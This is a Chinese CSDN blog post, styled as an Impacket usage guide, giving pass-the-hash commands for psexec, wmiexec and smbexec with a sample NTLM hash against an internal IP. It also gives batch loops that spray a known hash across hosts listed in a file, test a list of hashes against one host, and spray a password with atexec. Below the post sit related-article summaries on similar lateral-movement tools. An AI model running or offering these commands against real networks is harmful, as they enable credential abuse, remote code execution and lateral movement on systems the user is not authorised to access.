Impacket官方使用指南

最新推荐文章于 2024-05-28 21:46:40 发布
最新推荐文章于 2024-05-28 21:46:40 发布
阅读量901 收藏
点赞数
分类专栏: hash传递 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/113666733
版权

密码验证 NTLM哈希 内网渗透 hash喷洒 命令行工具
关键词由CSDN通过智能技术生成

不过不是完整的hash值,记得前面加冒号

+++++++++++++++++
后面不能跟命令
psexec.exe yq/administrator@192.168.100.12 -hashes 00000000000000000000000000000000:6ed6e04a0288d5175d84cc617a401285
或者
psexec.exe yq/administrator@192.168.100.12 -hashes :6ed6e04a0288d5175d84cc617a401285

在这里插入图片描述

后面可以跟命令
wmiexec -hashes 00000000000000000000000000000000:6ed6e04a0288d5175d84cc617a401285 administrator@192.168.100.12 “whoami”
或者
wmiexec -hashes :6ed6e04a0288d5175d84cc617a401285 administrator@192.168.100.12 “whoami”
在这里插入图片描述
后面不能跟命令
smbexec.exe -hashes 00000000000000000000000000000000:6ed6e04a0288d5175d84cc617a401285 administrator@192.168.100.12
在这里插入图片描述

hash喷洒攻击
内网机器遍历做hash传递验证,ips.txt内容为内网ip,每段一条
FOR /F %i in (ips.txt) do atexec.exe -hashes :6ed6e04a0288d5175d84cc617a401285 ./administrator@%i whoami
在这里插入图片描述

指定主机ntlm hash遍历验证,hashes.txt为已知ntlm hash内容,每段一条
FOR /F %i in (hashes.txt) do atexec.exe -hashes %i ./administrator@192.168.100.12 whoami

文件内部的hash格式应该为":nthash"或者"lmhash:nthash",如果只采用nthash切记加一个冒号":"

在这里插入图片描述

在这里插入图片描述

内网机器遍历做密码验证,passwords.txt为已知密码内容,每段一条
在这里插入图片描述
FOR /F %i in (ips.txt) do atexec.exe ./administrator:000000yy.@%i whoami

在这里插入图片描述

参考
http://www.manongjc.com/article/97872.html

樱浅沐冰
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
smbexec的使用(c$共享)
谢公子的博客
02-02 4529
目录 smbexec Impacket中的smbexec.py smbexec可以通过文件共享在运程系统中执行命令。对方主机需要开启 c$ 共享。 smbexec 工具说明: test.exe:客户端主程序 execserver.exe:目标系统中的辅助程序 使用: 将execserver.exe上次到目标系统的C:\Windows\目录下,以解除UAC对命令执行的限制,命令如下:...
2024年最全超详细Impacket官方使用指南(1),2024年最新2024HarmonyOS鸿蒙常见面试题分享
2401_84862386的博客
05-14 929
对于ntlmrelayx.py你还需要安装ldapdomaindump,flask并ldap3如果你在Windows下,你将需要安装 pyReadline最近发布的Impacket安装为了安装源,请从解压缩Impacket包的目录中执行以下命令:pip install . 这将把类安装到默认的Python模块路径中;请注意,您可能需要特殊的权限才能在那里进行写入。有关setup.py中可用的命令和选项的详细信息,请运行python setup.py --help-commands。
SMB工具横向移动
最新发布
Y22Lee的博客
05-28 414
2013年的Defcon上,就引入了smbexec,后续 smbexec 被 Impacket 进一步完善了。在Impacket中支持明文认证,NTLM认证,Aeskey认证等方式!
Impacket工具使用
qq_18811919的博客
02-22 3068
Impacket工具包使用
超详细Impacket官方使用指南
Javachichi的博客
01-30 2353
Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3和MSRPC)。数据包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具,作为在此库找到可以执行的操作的示例。有关某些工具的说明,请访问:https://www.secureauth.com/labs/open-source-tools/impacket
impacket-master.zip
03-23
Impacket支持Kerberos票证的生成和使用,对于渗透测试和系统审计非常有用。 4. **LDAP (Lightweight Directory Access Protocol)**:LDAP用于访问目录服务,Impacket允许开发者查询和修改目录信息,这对于理解和...
impacket-0.9.9.9
05-05
在本文中,我们将详细探讨Impacket的核心功能、使用场景以及如何利用0.9.9.9版本进行网络通信和安全分析。 **一、Impacket概述** Impacket是由Core Security开发并维护的一个Python库,它提供了一系列的类和工具,...
YanceSpring-F-IM-master_java_impacket-master_
10-04
7. **Impacket库应用**: 如何使用这个库来实现网络协议交互,进行安全测试或数据收集。 8. **Java框架集成**: 如果FindIM使用了特定的Java框架(如Spring、Hibernate等),那么框架的使用和集成也是重要的知识点。 ...
impacket-examples-windows-master.zip
06-14
- **认证攻击**:例如,使用NTLM relay或Kerberos relay进行身份验证绕过攻击。 - **文件系统操作**:通过SMB协议读取、写入或删除远程文件。 - **命名管道通信**:利用命名管道进行进程间通信或执行远程命令。 - **...
impacketImpacket是用于网络协议的Python类的集合
02-05
什么是ImpacketImpacket是用于网络协议的Python类的集合。 Impacket专注于提供对数据包的低级编程访问,并且对于某些协议(例如SMB1-3和MSRPC),协议实现本身。 数据包可以从头开始构建,也可以从原始数据中进行解析,而面向对象的API使处理协议深层次结构变得简单。 该库提供了一组工具,作为在该库的上下文中可以完成的操作的示例。 可以在以下找到一些工具的说明: : 有哪些协议? 以太网,Linux“ Cooked”捕获。 IP,TCP,UDP,ICMP,IGMP,ARP。 IPv4和IPv6支持。 NMB和SMB1,SMB2和SMB3(高级实现)
impacket, Impacket是用于处理网络协议的python 类的集合.zip
10-10
impacket, Impacket是用于处理网络协议的python 类的集合 什么是 ImpacketImpacket是用于处理网络协议的python 类的集合。 Impacket专注于为包提供底层编程访问,并针对某些协议实现( 。例如 NMB,SMB1-3和 ms dcerpc ) 协议本身。 包可以以从头开始
impacket-Impacket是个使用网络协议进行工作的工具集合-python
06-18
impacket-Impacket是个使用网络协议进行工作的工具集合 什么是ImpacketImpacket 是一组用于处理网络协议的 Python 类。 Impacket 专注于提供对数据包和某些协议(例如 NMB、SMB1-3 和 MS-DCEPC)的低级编程访问协议实现本身。 数据包可以从头开始构建,也可以从原始数据中解析出来,面向对象的 API 使处理深层协议变得简单。 该库提供了一组工具作为可以在该库的上下文中完成的操作的示例。 可以在以下位置找到对某些工具的描述: http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Impacket 具有哪些协议? 以太网,Linux“熟”捕获。 IP、TCP、UDP、ICMP、IGMP、ARP。 (IPv4 和 IPv6)NMB 和 SMB1/2/3(高级实现)。 DCE/RPC 版本 4 和 5,通过不同的传输:UDP(版本 4 专用)、TCP、SMB/TCP、SMB/NetBIO
ntlm-scanner:一个基于Impacket的简单python工具,可以对服务器进行各种已知的NTLM漏洞测试
03-21
新的!针对CVE-2020-1472的漏洞利用扫描(ZeroLogon) 扫描网络中的DC以检测对CVE-2020-1472的实际利用 例子: python scan.py -vuln CVE-2020-1472 -target-file targets.txt python scan.py -vuln CVE-2020-1472 -target <DC> 该工具的工作原理是每分钟尝试为DC设置一个空密码。由于漏洞利用必须将密码设置为空,除非快速恢复密码,否则它将在漏洞利用期间运行时检测漏洞尝试。 NTLM扫描仪 检查SMB上的各种NTLM漏洞。该脚本将建立与目标主机的连接,并发送无效的NTLM身份验证。如果接受此设置,则主机容易受到所应用的NTLM漏洞的攻击,您可以执行相关的NTLM攻击。更多信息,请参见: 请注意,大多数扫描不会生成失败的登录尝试,因为登录信息本身是
Impacket:一组用于处理网络协议的Python类-开源
04-25
Impacket是旨在用于网络协议的Python类的集合。 创建它的主要目的是希望减轻与实施网络协议和堆栈相关的障碍,并旨在加快研究和教育活动。 它提供了对数据包的低级编程访问,以及某些协议(例如SMB1-3和MSRPC)的协议实现本身。 它具有多种协议,包括以太网,IP,TCP,UDP,ICMP,IGMP,ARP,NMB和SMB1,SMB2和SMB3等。 Impacket的面向对象的API使处理协议的深层次结构变得容易。 它可以从头开始构造数据包,也可以从原始数据中解析它们。
【内网学习笔记】23、SMBExec 与 DCOM 的使用
TeamsSix 的 CSDN 空间
09-04 1424
1、SMBExec 利用 SMBExec 可以通过文件共享(admin$、c$、ipc$、d$)在远程系统中执行命令,它的工作方式类似于 PsExec C++ 版 C++ 版项目地址:https://github.com/sunorr/smbexec 一看这个项目是 8 年前上传的了,然后试了用 VS2019 没编译成功,而且目前各大杀软也都查杀这个工具了,所以这个就不看了,直接看 impacket 里的同类工具。 impacket 版 在 impacket 工具包里包含了 smbexec.py 工具,使用
内网渗透瑞士军刀-impacket工具解析(一)
失心少年
05-15 1002
impacket是一系列网络协议的python实现,实现包括IP、TCP、ICMP等基础的网络协议,更重要的是其实现了大量的Windows通信协议,包含Windows认证使用的ntlm和kerberos协议、用于活动目录数据存储的ldap及大量的msrpc协议。
impacket使用总结
热门推荐
Shanfenglan's blog
08-27 26万+
smbexec ./smbexec.py test/administrator@192.168.23.99 -hashes aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678 #左面是lm-hash,右边是nt-hash,lmhash可以为空 ./smbexec.py -hashes :3dbde697d71690a769204beb12283678 test/administrator@192.168.23.99 ./smb
impacket使用
07-28
Impacket是一个用于与Windows网络进行交互的Python库。它提供了多种协议的实现,包括SMB(Server Message Block)、NTLM认证、LDAP(Lightweight Directory Access Protocol)等。你可以使用Impacket来执行一些网络渗透测试任务,如密码破解、远程执行命令等。 要开始使用Impacket,你需要先安装它。你可以通过pip命令来安装Impacket: ``` pip install impacket ``` 安装完成后,你可以在Python脚本中导入Impacket的模块,并使用其中的函数和类来实现你的需求。例如,如果你想执行SMB连接和文件操作,你可以使用impacket.smbclient模块中的函数和类。 以下是一个简单的示例代码,演示了如何使用Impacket来连接SMB服务器并列出共享目录中的文件: ```python from impacket import smbclient # SMB服务器的IP地址 target = '192.168.0.1' # SMB服务器的用户名和密码 username = 'user' password = 'password' # 连接SMB服务器 conn = smbclient.SMBConnection(target, target) conn.login(username, password) # 列出共享目录中的文件 shares = conn.listShares() for share in shares: print(f'Share: {share.get_name()}') for f in conn.listPath(share.get_name(), '*'): print(f' File: {f.get_longname()}') # 断开连接 conn.close() ``` 这只是Impacket的一个简单示例,你可以根据自己的需求使用Impacket库中的其他功能。不过,请注意,在进行网络渗透测试或其他类似活动时,请遵守法律法规并获得合法授权。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值